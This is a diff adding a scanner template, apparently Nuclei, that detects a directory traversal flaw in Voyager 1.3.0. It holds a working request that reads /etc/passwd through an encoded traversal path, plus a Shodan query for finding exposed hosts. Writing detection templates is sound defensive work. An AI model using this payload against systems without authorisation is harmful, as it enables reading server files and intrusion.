diff --git a/http/vulnerabilities/other/voyager-lfi.yaml b/http/vulnerabilities/other/voyager-lfi.yaml new file mode 100644 index 0000000000..a5cf9d6ae1 --- /dev/null +++ b/http/vulnerabilities/other/voyager-lfi.yaml @@ -0,0 +1,39 @@ +id: voyager-lfi + +info: + name: Voyager 1.3.0 - Directory Traversal + author: mammad_rahimzada + severity: high + description: | + Voyager 1.3.0 is vulnerable to local file inclusion. + reference: + - https://www.exploit-db.com/exploits/47875 + classification: + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + shodan-query: html:"voyager-assets" + tags: voyager,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "text/plain" + + - type: status + status: + - 200